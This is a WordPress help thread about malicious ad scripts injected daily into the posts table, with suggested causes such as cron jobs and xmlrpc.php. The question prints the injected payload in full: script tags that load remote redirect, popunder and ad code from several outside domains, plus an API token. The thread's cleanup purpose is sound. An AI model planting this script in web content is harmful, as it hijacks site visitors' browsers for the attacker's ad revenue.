# Backdoor code injection in wordpress database - how to remove - better still how to fix?

Tags: mysql, wordpress, phpmyadmin, code-injection

Every day or so, backdoor code gets added (injected?) to the end of all the rows in wp_posts - post_content.

Wordfence picks up only the entry cutwin and alerts me - it doesn't clean it. I've also tried other WP anti malware plugins to no effect. All I know how to do at present is neuter it by using WP search&replace on 'cutwin', replacing with 'example', then painstakingly delete the code row by row. With 113 entries in the table, this is slow. My questions are:

1) Can someone give me SQL code that I can put in phpmyadmin to quickly delete it from all rows in wp_posts - post_content? A script that found the first line (see below) and removed that and everything after would do the trick, but I don't know myself how to code it.

2) Does anyone know what's causing this and how to get rid of it?

Theme: Generatepress

Plugins in use:
Akismet Anti Spam,
Anti-Malware Security and Brute-Force Firewall,
Better Search Replace,
Elementor,
Elementor Pro,
GP Premium,
Superfly Menu,
UpdraftPlus - Backup/Restore,
Use Any Font,
Wordfence Security,
WP Crontrol,
WP Rocket,
WP Smush,
WP-Sweep

The malicious code follows.

Many thanks,
Michael

```
<script type="text/javascript">
        var adlinkfly_url = 'https://cutwin.com/';
        var adlinkfly_api_token = 'f6624368d190e8c1819f49dc4d5fcb633a4d9641';
        var adlinkfly_advert = 2;
        var adlinkfly_exclude_domains = ['example.com', 'yoursite.com'];
    </script>
    <script src='//cutwin.com/js/full-page-script.js'></script>
    <script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script type="text/javascript">//<![CDATA[ 
(function() {
var configuration = {
"token": "11f0dc1ed8453e409e04d86bea962f34",
"exitScript": {
    "enabled": true
},
"popUnder": {
    "enabled": true
}
};
var script = document.createElement('script');
script.async = true;
script.src = '//cdn.shorte.st/link-converter.min.js';
script.onload = script.onreadystatechange = function () {var rs = this.readyState; if (rs && rs != 'complete' && rs != 'loaded') return; shortestMonetization(configuration);};
var entry = document.getElementsByTagName('script')[0];
entry.parentNode.insertBefore(script, entry);
})();
//]]></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script>
```

Comment: is the code identical? look into mysql str_replace. you'll find a "find and replace" query. Also, it might help to list out the plugins you have installed. Chances are your problem is in there.

Comment: Thanks Kai. It is identical, every time. Trouble with a standard find and replace is that the code spans several lines and itself includes quotes, so that fails. I'll add the plugins above in a moment.

Comment: you should be able to escape quotes. you can clone the table and run experiments on that.

Comment: I'll look into it and try!

Comment: Hi, I'm battling against exactly the same problem at the moment. Interestingly, there are absolutely no similarities between your site and mine, except for Wordfence... makes me wonder if Wordfence is all it's cracked up to be right now. Please post if you find a culprit and/or solution!

Answer (score 1):

Since the cutwin script is being injected periodically the first thing I would suspect is that the malware is using a cron job to do the injection. The cron jobs are stored in the wp_options table with option_name 'cron'. Unfortunately, this is a serialized value and is very hard to read directly. However, you can create a simple PHP script to unserialize it.

```
<?php 
require('wp-load.php');
var_dump( get_option( 'cron' ) );
?>
```

I would save this in the root directory (where wp-load.php is found) and run it from your browser. The ouput looks like this:

```
Array
(
    [1522826738] => Array
        (
            [delete_expired_transients] => Array
                (
                    [40cd750bba9870f18aada2478b24840a] => Array
                        (
                            [schedule] => daily
                            [args] => Array
                                (
                                )

                            [interval] => 86400
                        )

                )

        )

    [1522826996] => Array
        (
            [wp_update_plugins] => Array
                (
                    [40cd750bba9870f18aada2478b24840a] => Array
                        (
                            [schedule] => twicedaily
                            [args] => Array
                                (
                                )

                            [interval] => 43200
                        )

                )

            [wp_update_themes] => Array
                (
                    [40cd750bba9870f18aada2478b24840a] => Array
                        (
                            [schedule] => twicedaily
                            [args] => Array
                                (
                                )

                            [interval] => 43200
                        )

                )

            [wp_version_check] => Array
                (
                    [40cd750bba9870f18aada2478b24840a] => Array
                        (
                            [schedule] => twicedaily
                            [args] => Array
                                (
                                )

                            [interval] => 43200
                        )

                )

        )

    [1522827110] => Array
        (
            [wp_scheduled_delete] => Array
                (
                    [40cd750bba9870f18aada2478b24840a] => Array
                        (
                            [schedule] => daily
                            [args] => Array
                                (
                                )

                            [interval] => 86400
                        )

                )

        )

    [1522828797] => Array
        (
            [wp_scheduled_auto_draft_delete] => Array
                (
                    [40cd750bba9870f18aada2478b24840a] => Array
                        (
                            [schedule] => daily
                            [args] => Array
                                (
                                )

                            [interval] => 86400
                        )

                )

        )
```

where 'delete_expired_transients', 'wp_update_plugins', 'wp_update_themes', ... are the names of PHP functions to run periodically. Check that all of these functions are reasonable. If the malware programmer is skilled he/she would use something more hidden but you should check that there are no strange cron jobs.

Comment: Hi. Thanks for that insight. I'm having exactly the same problem, but I don't really see any cron functions that are looking out of place. I'm wondering if anyone else might have an idea:

Comment: A skilled malware writer would probably not use a cron job but have his/her code run everytime WordPress runs but only periodically update the database so it appears to be a cron job. Since, the malware must update the database it should be possible to isolate that code by monitoring all sql updates and/or modifying the sql routines used by WordPress.

Comment: Many thanks for all this magenta. I'll check that out. In the meantime I disabled xmprpc.php in wp.config.

Comment: I'll add - also, last night, before this answer came, I *did* remove a tracker cron from elementor extras - a plugin that I'd deleted, but the cron remained, running once a day... So there may have been something fishy with that. So far, cutwin hasn't returned. 
OR, it may have been disabling xmlrpc.php that did it. 
That was easy - just adding: add_filter('xmlrpc_enabled', '__return_false');

to the end of wp-config.php

Comment: I used the WP-Crontrol plugin to delete the cron entry. Magenta - I did as you suggested and it just showed me the same entries as in WP Crontrol.

Comment: If xmprppc.php is the problem then either it explicitly contains the string contaning 'cutwin' or more likely it dynamically constructs this string at run time so this string exists only temporarily in memory. So if the source is small enough I would look for strange string manipulations. However, Michael does not report this as an installed plugin. But, beware a skilled programmer can hide a plugin from the dashboard.

Comment: Sorry, I meant xmlrpc.php. It's a core WP file that allows remote posting and there's plenty on google to say it's a liability. If that had been altered I think Wordfence and the other antimalware thing would have def seen it; I think it's more a question of its liability.

Comment: Update - no more injection in 2 days - I'm close to saying one of these strategies has worked...

Comment: A cron entry on a non-existent function has no effect on your system except wasting a little cpu time. The fact that the cron entry existed after you deleted the plugin probably means that the developer did not do proper clean-up upon deactivation - i.e., he/she was lazy but not malicious. Anyway, is it possible for me to get that 'elementor extras' plugin. I would like to look at its source code as these kinds o things interest me. If it is not too large I will read it and let you know what I find out.

Comment: The plugin was inactive but the files still there, so a function could have been called (as far as I know). Will try and get it to you. Now been 4 days without injection :)

Comment: When you deleted the plugin (you did mean delete not inactivate?) the plugin files should have been deleted. That those files are still on your system is very suspicious. This means the plugin may have actively done something to prevent deletion and seems malicious to me.

Comment: No - I'd only inactivated it - perhaps that's why the cron entry was there. But I've looked at the tracker - it was harmless. I really think it was a remote thing, using xmlrpc.php to achieve it. I sent you the tracker code privately.